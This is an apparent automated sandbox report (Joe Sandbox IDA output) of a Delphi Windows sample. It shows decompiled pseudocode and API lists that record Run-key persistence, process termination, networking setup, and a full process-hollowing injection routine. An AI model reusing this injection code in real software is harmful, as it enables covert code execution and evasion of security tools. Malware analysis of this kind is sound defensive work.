      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}









    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 85%
    			_entry_() {
    				char _v24;
    				char _v28;
    				void* _t17;
    				void* _t21;
    				void* _t32;
    				void* _t33;
    				void* _t38;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t42;
    
    				_v28 = 0;
    				_v24 = 0;
    				E00405ADC(0x418be0);
    				_push(0x418d7b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				_push(_t40);
    				_push(0x418d4a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t41;
    				_t42 = E00402944(_t32, _t39) - 2;
    				if(_t42 > 0) {
    					E004029A4(2,  &_v24);
    					E00404294(_v24, 0x418d94);
    					if(_t42 == 0) {
    						E004029A4(3,  &_v28);
    						DeleteFileA(E00404348(_v28)); // executed
    					}
    				}
    				E00418750(_t32, _t38, _t39); // executed
    				E00418A14(_t32, _t38, _t39);
    				E00418540(_t33);
    				E00418B90(_t33);
    				while(1) {
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    					if(_t17 == 0) {
    						continue;
    					}
    					L5:
    					E00418590(_t43);
    					while(E00418570() != 0) {
    						E004189E8();
    						Sleep(0x32);
    					}
    					_t21 =  *0x454a64; // 0x0
    					ResumeThread(_t21);
    					do {
    						goto L4;
    					} while (_t17 == 0);
    					goto L5;
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    				}
    			}














    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D14() {
    				intOrPtr* _t13;
    				struct HINSTANCE__* _t27;
    				void* _t36;
    				intOrPtr _t39;
    				void* _t52;
    
    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L5:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t36);
    						 *0x419004 = 0;
    					}
    					L7:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t17 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t17);
    							_t39 =  *((intOrPtr*)(0x454640));
    							_t7 = _t39 + 0x10; // 0x400000
    							_t27 =  *_t7;
    							_t8 = _t39 + 4; // 0x400000
    							if(_t27 !=  *_t8 && _t27 != 0) {
    								FreeLibrary(_t27);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t52 = _t52 + 0xc;
    					0x419000 = 0x419000;
    					goto L7;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L5;
    				}
    			}









    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
    				char _v1032;
    				int _t13;
    				void* _t22;
    
    				_t21 = __edx;
    				if(__eax != 0) {
    					if( *(__eax + 4) >= 0x10000) {
    						return E00404080(__edx,  *(__eax + 4));
    					}
    					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
    					return E00403F78(_t21, _t13, _t22);
    				}
    				return __eax;
    			}

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}

    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}

    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				CONTEXT* _v16;
    				void* _v20;
    				void _v24;
    				void _v28;
    				long _v32;
    				struct _PROCESS_INFORMATION _v48;
    				struct _STARTUPINFOA _v116;
    				CHAR* _t95;
    				short* _t171;
    				intOrPtr _t182;
    				intOrPtr _t189;
    				intOrPtr* _t194;
    				short* _t196;
    				void* _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr _t201;
    				void* _t215;
    
    				_t215 = __fp0;
    				_t199 = _t200;
    				_t201 = _t200 + 0xffffff90;
    				_t196 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t199);
    				_push(0x418218);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t201;
    				if(_v12 != 0) {
    					_push(0x418230);
    					_push(_v8);
    					_push(0x41823c);
    					_push(_v12);
    					E00404208();
    				}
    				 *_a4 = 0;
    				_t171 = _t196;
    				if( *_t171 == 0x5a4d) {
    					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
    					if( *_t194 == 0x4550) {
    						E00402B60( &_v116, 0x44);
    						E00402B60( &_v48, 0x10);
    						_v116.cb = 0x44;
    						_v116.dwFlags = 1;
    						_v116.wShowWindow = 0;
    						_t95 = E00404348(_v12);
    						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
    							 *_a4 = _v48.dwProcessId;
    							_v16 = E00417F28( &_v20);
    							if(_v16 != 0) {
    								_v16->ContextFlags = 0x10007;
    								if(GetThreadContext(_v48.hThread, _v16) != 0) {
    									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
    									if( *(_t194 + 0x34) != _v24) {
    										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    									} else {
    										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
    											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
    										} else {
    											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    										}
    									}
    									_t210 = _v28;
    									if(_v28 != 0) {
    										_t197 = E00417EA4(_t196, _t210);
    										_t125 = _v28;
    										if( *(_t194 + 0x34) != _v28) {
    											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
    											 *(_t194 + 0x34) = _v28;
    											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
    										}
    										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
    										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
    										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
    										SetThreadContext(_v48.hThread, _v16);
    										ResumeThread(_v48.hThread);
    										WaitForSingleObject(_v48.hThread, 0xffffffff);
    										_push(_t199);
    										_push(0x4181d0);
    										_push( *[fs:eax]);
    										 *[fs:eax] = _t201;
    										TerminateThread(_v48.hProcess, 0);
    										CloseHandle(_v48.hProcess);
    										_pop(_t189);
    										 *[fs:eax] = _t189;
    									}
    								}
    								VirtualFree(_v20, 0, 0x8000);
    							}
    							if( *_a4 == 0) {
    								TerminateProcess(_v48, 0);
    							}
    						}
    					}
    				}
    				_pop(_t182);
    				 *[fs:eax] = _t182;
    				_push(E0041821F);
    				return E00403EAC( &_v12, 2);
    			}

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
